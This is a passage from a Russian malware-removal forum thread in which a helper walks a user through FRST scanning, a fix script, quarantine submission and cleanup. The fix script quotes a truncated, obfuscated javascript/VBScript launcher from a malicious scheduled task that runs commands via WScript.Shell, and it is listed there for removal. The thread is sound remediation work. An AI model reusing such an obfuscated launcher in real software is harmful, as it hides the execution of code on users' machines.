Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте!

 

Дополнительно, пожалуйста:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CloseProcesses:
    SystemRestore: On
    CreateRestorePoint:
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ConsoleTesting2016(v.1) — ярлык.lnk [2022-11-06]
    ShortcutTarget: ConsoleTesting2016(v.1) — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\ConsoleTesting2016(v.1).exe (Нет файла)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HWiNFO64 — ярлык.lnk [2022-11-06]
    ShortcutTarget: HWiNFO64 — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\HWiNFO64.exe (Нет файла)
    Task: {5AB57EC3-A231-4F10-BF1D-E3A5C8A4398E} - System32\Tasks\$sxr-jHwFrjowLDztNScXPPPT => %$sxr-jHwFrjowLDztNScXPPPT4321%  "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x (запись имеет ещё 193 символов). (Нет файла)
    S3 ALSysIO; \??\C:\Users\836D~1\AppData\Local\Temp\ALSysIO64.sys [X] <==== ВНИМАНИЕ
    S3 GPU-Z-v2; \??\C:\Users\836D~1\AppData\Local\Temp\GPU-Z-v2.sys [X] <==== ВНИМАНИЕ
    S3 HWiNFO_160; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_160.SYS [X] <==== ВНИМАНИЕ
    S3 HWiNFO_173; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_173.SYS [X] <==== ВНИМАНИЕ
    Zip: c:\FRST\Quarantine\
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

На рабочем столе появится архив Date_Time.zip (Дата_Время)
Отправьте его на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

Ссылка на сообщение
Поделиться на другие сайты
  • 2 weeks later...

Да, скачал, спасибо!

В завершение, пожалуйста:

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • bittok23
      От bittok23
      Пытался удалить разными способами, ничего не получается
       
      CollectionLog-2023.11.25-21.40.zip
    • Илья771
      От Илья771
      В мониторинге активности  в Kaspersky Internet Security появляются следующие сообщения
       
      Событие: Обнаружен вредоносный объект
      Пользователь: LAPTOP-6E6IL8NS\ivano
      Тип пользователя: Активный пользователь
      Компонент: Антивирусная проверка
      Результат: Обнаружено
      Описание результата: Обнаружено
      Тип: Троянская программа
      Название: Trojan.Multi.GenAutorunReg.a
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Файл
      Имя объекта: System Memory
      Причина: Экспертный анализ
      Дата выпуска баз: Сегодня, 09.11.2023 4:59:00
       
      После лечения и перезагрузки при выполнении полной проверки написано, что угроз не обнаружено, но через некоторое время троян снова появляется
       
      Ссылка на лог (не нашел как прикрепить файлом) https://drive.google.com/file/d/1VA9HPyE1nDvZylA_nbNCMldgjeijKm1c/view?usp=sharing
    • Moonbeam
      От Moonbeam
      Опять здравствуйте! Сегодня KIS опять обнаружил троян. Помогите пожалуйста.
      CollectionLog-2023.11.05-15.30.zip
    • Степанов Владимир
      От Степанов Владимир
      Добрый вечер.
      У меня на домашнем компе Защитник Виндовс 10 обнаружил вирус в файле, находящемся в папке: AV_block_remover\taskhostw.exe: Behavior:Win32/Persistence.A!ml
      process: pid:17160,ProcessStart:133434935668816440
      Это происходит примерно за полгода второй или третий раз.
      То есть у меня на компе сидит скрытый Майнер, который никакой антивирусник удалить не может или я что то неправильно понимаю??
      В этой теме была похожая ситуация, такой же вирус: https://forum.kasperskyclub.ru/topic/419725-majner-behaviorwin32persistenceaml-sedaet-kompjuter-i-ne-udaljaetsja/
       
      Сообщение от модератора thyrex Перенесено из темы  
    • TTTTT
      От TTTTT
      На компьютере Касперским был обнаружен  MEM: Trojan.Win32.SEPEH.gen.
      Несколько раз его удалял, но каждый раз после перезагрузки антивирус находил его снова.
      Прекрепляю логи
      CollectionLog-2023.10.30-15.06.zip
×
×
  • Создать...